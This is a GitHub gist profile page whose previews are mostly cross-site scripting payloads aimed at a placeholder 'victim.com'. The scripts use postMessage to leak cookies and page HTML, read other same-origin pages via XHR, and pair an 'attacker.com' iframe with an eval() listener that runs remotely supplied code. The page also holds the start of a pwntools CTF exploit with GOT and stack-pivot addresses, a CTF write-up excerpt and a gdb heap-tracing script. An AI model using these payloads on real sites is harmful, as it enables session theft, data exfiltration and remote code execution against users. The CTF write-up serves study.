Skip to content

Instantly share code, notes, and snippets.

View ancat's full-sized avatar
🌵
h

OMAR ancat

🌵
h
119 followers · 77 following
View GitHub Profile
@ancat
ancat / gist:2864762
Created June 3, 2012 19:36
<script>
window.top.postMessage(document.cookie, '*');
</script>
@ancat
ancat / gist:2864666
Created June 3, 2012 19:08
<script>
window.addEventListener(
'message',
function(e) {
window.top.postMessage(
function() {var x=new XMLHttpRequest();x.open('GET',e.data,false);x.send();return x.responseText}(), '*'
)
},
false);
</script>
@ancat
ancat / gist:2862041
Created June 3, 2012 05:25
<script>
var w = window.open("http://www.victim.com/vulnerable.php?string=<script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>", "somewindow");
w.postMessage("window.opener.postMessage(document.body.innerHTML, '*')", "*");
</script>
@ancat
ancat / gist:2862020
Created June 3, 2012 05:15
http://victim.com/vulnerable.php?string=<script>window.top.postMessage(function() {var x=new XMLHttpRequest();x.open('GET','/other/page.html',false);x.send();return x.responseText}(), '*')</script>
@ancat
ancat / gist:2861997
Created June 3, 2012 05:08
http://victim.com/vulnerable.php?string=<iframe src="http://attacker.com/"></iframe><script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>
@ancat
ancat / gist:2862003
Created June 3, 2012 05:10
http://victim.com/vulnerable.php?string=<iframe src="http://attacker.com/" id="someframe"></iframe><script>document.getElementById('someframe').contentWindow.postMessage(document.body.innerHTML, '*')</script>
@ancat
ancat / gist:2862016
Created June 3, 2012 05:15
http://victim.com/vulnerable.php?string=<script>window.top.postMessage(document.body.innerHTML, '*')</script>
@ancat
ancat / exploit250.py
Last active August 29, 2015 14:18
from pwn import *
import sys
lei = lambda x: struct.pack('I', x);
stack_chk = 0x0804B01C # location of stack_chk in the got
ret = 0x08048D89 # stack pivot (sub esp, 0x1c; pop; pop; pop; pop; ret;)
live = True
if live:
@ancat
ancat / Kendall.md
Last active August 29, 2015 14:16

Kendall

Kendall was a 300 point "red" challenge - an exploitable. This was a pretty involved challenge but it was simple once you realized what you had to do. Launching the binary would start a forking server for some DHCP Management Console.

Playing around with the console, it's clear that authenticating is going to be integral to solving the challenge. The authenticate function opens a password.txt file and compares it with your input. You would probably be able to use the strcmp as a timing oracle to brute force the password, but that's kind of lame.

While reversing, we noticed the same strange function being used to read user input being used everywhere. Strange, mostly because it only accepted a size parameter. It didn't accept a destination buffer nor did it allocate space for one - it just used the same statically sized 128 byte long buffer in the .bss segment.

@ancat
ancat / gist:0d4b7f8740ae6faa6cc3
Created June 16, 2014 22:44
set $root = 0x804c36c
# first element
break *0x08049030
commands
silent
printf "allocated first_node->name @ 0x%x\n", $eax
continue
end
break *0x0804903D